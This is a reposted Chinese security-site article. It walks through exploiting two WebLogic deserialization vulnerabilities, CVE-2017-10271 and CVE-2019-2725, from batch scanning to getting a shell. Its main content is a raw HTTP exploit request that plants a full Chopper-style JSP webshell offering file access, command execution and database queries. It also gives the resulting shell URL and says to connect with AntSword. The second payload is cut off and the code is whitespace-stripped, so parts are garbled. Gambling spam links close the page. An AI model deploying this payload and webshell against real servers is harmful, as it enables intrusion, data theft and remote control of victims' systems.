安基网 欢乐生肖 安全 攻防案例 查看内容

复现两个weblogic漏洞的GetShell验证

2020-2-6 15:24| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 搜索公众号:暗网黑客可领全套安全课程、配套攻防靶场本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工 ...

本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。

主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工具即可。

在这里就不分享了,只分享payload请求代码。


Weblogic CVE-2017-10271

批量扫描


命令执行

Getshell

Payload

POST/wls-wsat/CoordinatorPortTypeHTTP/1.1Host:192.168.43.4:7001Accept-Encoding:gzip,deflateAccept:*/*Accept-Language:enUser-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Win64;x64;Trident/5.0)Connection:closeContent-Type:text/xmlContent-Length:9559servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp<%!StringPwd="chopper";Stringcs="UTF-8";StringEC(Strings)throwsException{returnnewString(s.getBytes("ISO-8859-1"),cs);}ConnectionGC(Strings)throwsException{String[]x=s.trim().split("rn");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){returnDriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connectionc=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}returnc;}}voidAA(StringBuffersb)throwsException{Filer[]=File.listRoots();for(inti=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}voidGG(Strings,Stringd)throwsException{Stringh="0123456789ABCDEF";Filef=newFile(s);f.createNewFile();FileOutputStreamos=newFileOutputStream(f);for(inti=0;i5?x[5]:x[4]:null,"%",newString[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}voidPP(Strings,StringBuffersb)throwsException{String[]x=s.trim().split("rn");Connectionc=GC(s);Statementm=c.createStatement(1005,1007);ResultSetr=m.executeQuery("select*from"+x[x.length-1]);ResultSetMetaDatad=r.getMetaData();for(inti=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+"("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}voidQQ(Stringcs,Strings,Stringq,StringBuffersb,Stringp)throwsException{Connectionc=GC(s);Statementm=c.createStatement(1005,1008);BufferedWriterbw=null;try{ResultSetr=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaDatad=r.getMetaData();intn=d.getColumnCount();for(inti=1;i<=n;i++){sb.append(d.getColumnName(i)+"t|t");}sb.append("rn");if(q.indexOf("--f:")!=-1){Filefile=newFile(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=newBufferedWriter(newOutputStreamWriter(newFileOutputStream(newFile(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(inti=1;i<=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"t");bw.flush();}else{sb.append(r.getObject(i)+""+"t|t");}}if(bw!=null){bw.newLine();}sb.append("rn");}r.close();if(bw!=null){bw.close();}}catch(Exceptione){sb.append("Resultt|trn");try{m.executeUpdate(q);sb.append("ExecuteSuccessfully!t|trn");}catch(Exceptionee){sb.append(ee.toString()+"t|trn");}}m.close();c.close();}%><%cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffersb=newStringBuffer("");try{StringZ=EC(request.getParameter(Pwd)+"");Stringz1=EC(request.getParameter("z1")+"");Stringz2=EC(request.getParameter("z2")+"");sb.append("->"+"|");Strings=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}elseif(Z.equals("B")){BB(z1,sb);}elseif(Z.equals("C")){Stringl="";BufferedReaderbr=newBufferedReader(newInputStreamReader(newFileInputStream(newFile(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}elseif(Z.equals("D")){BufferedWriterbw=newBufferedWriter(newOutputStreamWriter(newFileOutputStream(newFile(z1))));bw.write(z2);bw.close();sb.append("1");}elseif(Z.equals("E")){EE(z1);sb.append("1");}elseif(Z.equals("F")){FF(z1,response);}elseif(Z.equals("G")){GG(z1,z2);sb.append("1");}elseif(Z.equals("H")){HH(z1,z2);sb.append("1");}elseif(Z.equals("I")){II(z1,z2);sb.append("1");}elseif(Z.equals("J")){JJ(z1);sb.append("1");}elseif(Z.equals("K")){KK(z1,z2);sb.append("1");}elseif(Z.equals("L")){LL(z1,z2);sb.append("1");}elseif(Z.equals("M")){String[]c={z1.substring(2),z1.substring(0,2),z2};Processp=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}elseif(Z.equals("N")){NN(z1,sb);}elseif(Z.equals("O")){OO(z1,sb);}elseif(Z.equals("P")){PP(z1,sb);}elseif(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("","/")+"images/");}}catch(Exceptione){sb.append("ERROR"+"://"+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>]]>

过程

Burp抓包后全部payloadk内容黏贴到请求包只改IP和端口

Shell地址

http://192.168.43.4:7001/bea_wls_internal/test.jsp

验证

蚁剑连接



Weblogic CVE-2019-2725

批量扫描


命令执行

这回不命令执行直接GetShell


Getshell

Payload

POST/_async/AsyncResponseServiceHTTP/1.1Host:192.168.43.4:7001Content-Length:880Accept-Encoding:gzip,deflateSOAPAction:Accept:*/*User-Agent:Apache-HttpClient/4.1.1(java1.5)Connection:keep-alivecontent-type:text/xmlxxxx 34 equals elseif append internal webshell sb weblogic 192.168 命令 


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6790149262551286283/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
幸运飞艇官网 快三投注网 幸运飞艇官网 三分时时彩 福建11选5官网 幸运飞艇官网 极速11选5 极速快乐十分 福建11选5官网 湖北快3代理